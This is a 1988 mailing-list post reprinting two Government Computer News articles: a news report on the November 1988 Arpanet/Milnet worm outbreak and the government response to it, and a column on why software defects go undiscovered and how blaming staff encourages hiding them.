christevt%amsp6.decnet@WPAFB-AMS1.ARPA ("AMSP6::CHRISTEVT") (12/13/88)
I N T E R O F F I C E M E M O R A N D U M
Date: 12-Dec-1988 14:22
From: Victor ET Christensen
CHRISTEVT
Dept:
Tel No:
TO: _MAILER! ( _DDN[VIRUS-L%LEHIIBM1.BITNET@CUNYVM.CUNY.EDU] )
TO: _MAILER! ( _DDN[ETHICS-L%POLYGRAF.BITNET@CUNYVM.CUNY.EDU] )
TO: _MAILER! ( _DDN[TCP-IP@SRI-NIC.ARPA] )
Subject: Virus and ethics articles
OK, folks, I got permission to send these out...I hope they're not too
out of date! These have been posted to VIRUS-L, ETHICS-L and TCP-IP...
For both:
Government Computer News
8601 Georgia Avenue, Suite 300
Silver Spring, MD 20910
(301) 650-2000
November 21, 1988
Volume 7 Number 24
Copyright 1988 Ziff-Davis Publishing Company
Cover and page 100:
"BIG GUNS TAKE AIM AT VIRUS"
by Neil Munro, GCN Staff
"In the aftermath of the most recent virus infection of the Defense Data
Network and Arpanet, Defense Department and National Institute of Standards
and Technology computer security officials are scrambling to head off further
attacks.
"Officials of the facilities struck by the virus met this month to
discuss its nature and impact. The meeting at National Security Agency
headquarters in Fort Meade, Md., included representatives of NSA and NIST as
'observers,' according to NIST computer security chief Stuart Katzke.
"Two days later, NSA and NIST officials met again to discuss how to
avert future infections, Katzke said. Katzke, who attended both meetings, said
no decisions had been reached on how to combat viruses, and NSA and NIST
representatives will meet again to firm up recommendations.
"Katzke, however, suggested one solution would be the formation of a
federal center for anti-virus efforts, operated jointly by NSA's National
Computer Security Center (NCSC) and NIST.
"The center would include a clearinghouse that would collect and
disseminate information about threats, such as flaws in operating systems, and
solutions. However, funding and personnel for the center is a problem, he
said, because NIST does not have funds for such a facility.
"The center also would help organize responses to emergencies by quickly
warning users of new threats and defenses against them, he said. People with
solutions to a threat could transmit their answers through the center to
threatened users, he said. A database of experts would be created to speed
response to immediate threats.
"The center would develop means of correcting flaws in software, such as
trapdoors in operating systems. Vendors would be asked to develop and field
solutions, he said.
"NIST would work on unclassified systems and the NCSC would work on
secure military systems, he said. Information learned about viruses from
classified systems might be made available to the public through the
clearinghouse, Katzke said, although classified information would have to be
removed first.
"Although the virus that prompted these meetings did not try to destroy
data, it made so many copies of itself that networks rapidly became clogged,
greatly slowing down communications. Across the network, computer systems
crashed as the virus continuously replicated itself.
"During a Pentagon press conference on the virus outbreak, Raymond
Colladay, director of the Defense Advanced Research Projects Agency (DARPA),
said the virus hit 'several dozen' installations out of 300 on the agency's
unclassified Arpanet network.
"Thousands Affected
"The virus also was found in Milnet, which is the unclassified portion
of the Defense Data Network. Estimates of how many computers on the network
were struck varied from 6,000 to 250,000. The virus did not affect any
classified systems, DOD officials said.
"The virus hit DARPA computers in Arlington, Va., and the Lawrence
Livermore Laboratories in California as well as many academic institutions,
Colladay said. It also affected the Naval Ocean Systems Command in San Diego
and the Naval Research Laboratory in Maryland, a Navy spokesman said.
"Written in C and aimed at the UNIX operating system running on Digital
Equipment Corp. VAX and Sun Microsystems Inc. computers, the virus was
released Nov. 2 into Arpanet through a computer at the Massachusetts Institute
of Technology in Cambridge, Mass.
"The Virus apparently was intended to demonstrate the threat to
networked systems. Published reports said the virus was developed and
introduced by a postgraduate student at Cornell University who specializes in
computer security. The FBI has interviewed the student.
"Clifford Stoll, a computer security expert at Harvard University who
helped identify and neutralize the virus, said the virus was about 40
kilobytes long and took 'several weeks' to write. It replicated itself in
three ways.
"Spreading the Virus
"The first method exploited a little-known trapdoor in the Sendmail
electronic-mail routine of Berkeley UNIX 4.3, Stoll said. The trapdoor was
created by a programmer who wanted to remove some bugs, various reports said.
However, the programmer forgot to remove the trapdoor in the final production
version. In exploiting this routine, the virus tricked the Sendmail program
into distributing numerous copies of the virus across the network.
"Another method used by the virus was an assembly language program that
found user names and then tried simple variations to crack poorly conceived
passwords and break into more computers, Stoll said.
"Yet another replication and transmission method used a widely known bug
in the Arpanet Finger program, which lets users know the last time a distant
user has signed onto a network. By sending a lengthy Finger signal, the virus
gained access to the operating systems of Arpanet hosts.
"The virus was revealed because its creator underestimated how fast the
virus would attempt to copy itself. Computers quickly became clogged as the
virus rapidly copied itself, although it succeeded only once in every 10 copy
attempts.
"Users across the country developed patches to block the virus' entrance
as soon as copies were isolated and analyzed. Many users also used Arpanet to
disseminate the countermeasures, although transmission was slowed by the
numerous virus copies in the system.
"DARPA officials 'knew precisely what the problem was,' Colladay said.
'Therefore, we knew precisely what the fix was. As soon as we had put that fix
in place, we could get back on,line.'
"Colladay said DARPA will revise security policy on the network and will
decide whether more security features should be added. The agency began a
study of the virus threat two days after the virus was released, he said.
"All observers said the Arpanet virus helped raise awareness of the
general virus threat. Several experts said it would help promote computer
security efforts. 'Anytime you have an event like this it heightens awareness
and sensitivity,' Colladay said.
"However, Katzke cautioned that viruses are less of a threat than are
access abusers and poor management practices such as inadequate disaster
protection or password control. Excellent technical anti-virus defenses are of
no use if management does not maintain proper control of the system, he said.
"Congress also is expected to respond to the virus outbreak. The
Computer Virus Eradication Act of 1988, which lapsed when Congress recessed in
October, will be reintroduced by Rep. Wally Herger (R-Calif.), according to
Doug Griggs, who is on Herger's staff."
Whew!!! Now for the next one...
Page 85:
"WHY SOFTWARE DEFECTS SO OFTEN GO UNDISCOVERED"
DP ISSUES by William E. Perry
"Much has been written recently about defects in computer software.
Defects are not new, but quantifying their frequency is new. We are beginning
to see the magnitude of the problem.
"Some researchers say we are making between 40 and 80 defects per 1,000
lines of source code. A line of source code normally is defined as an
executable line of code. A defect is a variation from specifications, no
matter how insignificant.
"Most defects are caught before the system goes into production.
However, we are told that, on average, one to three defects per 1,000 lines of
code get into production. The production defects can cause a minor
inconvenience, such as misspelling an executive's name, or wreak havoc in an
organization through the loss of large amounts of resources.
"There are two kinds of defects: internal defects, which are those
uncovered by the information systems group, and external defects, which are
uncovered by end users.
"The question that needs to be asked in your organization is, 'Who
uncovers the defects?'
"The answer may determine how credible your organization is in the eyes
of your end users. The more defects uncovered by the information systems
community, the greater the credibility of that information processing
function.
"Discouraging Efforts
"But information systems personnel may be discouraged from identifying
defects, for several reasons:
"- Finding a defect may mean more work for them, not only in correcting
it but also in tracking, monitoring and retesting the corrections.
"- Frequently, there is a finger-pointing to determine who is
responsible for the defect. The game is to pin the blame on another person. An
individual held responsible for a defect can lose professional credibility and
be ridiculed by his colleagues.
"- Finally, defects can result in schedule delays or budget overruns. It
costs a lot of money to fix a defective product, and the time and effort
required could delay the project.
"Minor defects may be ignored, or defect analysis can me skipped, to
meet schedule and budget limits.
"There are also adverse consequences when defects are uncovered outside
the information systems group.
"First is the high cost of correction. Barry Boehm of TRW Inc. said the
cost of correcting a defect in production can be as much as 100 times the cost
of correcting it during development.
"Also, the information systems group may lose credibility. The end users
may look for alternative solutions, such as purchased software or
end-user-developed applications.
"Some fundamental truths have a bearing on who uncovers defects and the
effect of those defects.
"First, punishing those who detect defects in-house only tranfers the
job to external users and customers. If it is made undesirable for the author
to find defects in his own work, he won't look for them. People naturally
avoid punishment.
"Hiding the Blame
"When individuals are held to blame for defects, they tend to hide them.
For example, when an independent test group is checking the work of a software
author, and that test will pinpoint blame on the author, the author will do
whatever can be done to get the system through the test so future blame will
rest on the independent test rather than the author.
"When individuals are encouraged to hide defects, the cause of those
defects cannot be corrected and they will recur in future systems. This is the
major consequence of blaming people, rather than processes, for defects.
"The objective of the information systems organization should be to
detect 100 of the application defects internally.
"All defects must be considered. These include not only defects made
because of MIS errors but also defects because of poor requirement
identification and poor design concepts. Whenever the system fails to meet the
true needs of the customer in a cost-effective manner, it should be considered
a defect.
"Information systems managers must uncover defects internally. This
means not blaming one's employees for defects uncovered during development. In
fact, it may be necessary to reward internally uncovered defects in order to
reduce externally uncovered defects."
William E. Perry is executive director, Quality Assurance Institute,
Orlando, Fla.
That's it! I hope at least some, if not all, of you found it of
interest!
ET B ME
VIC
!
------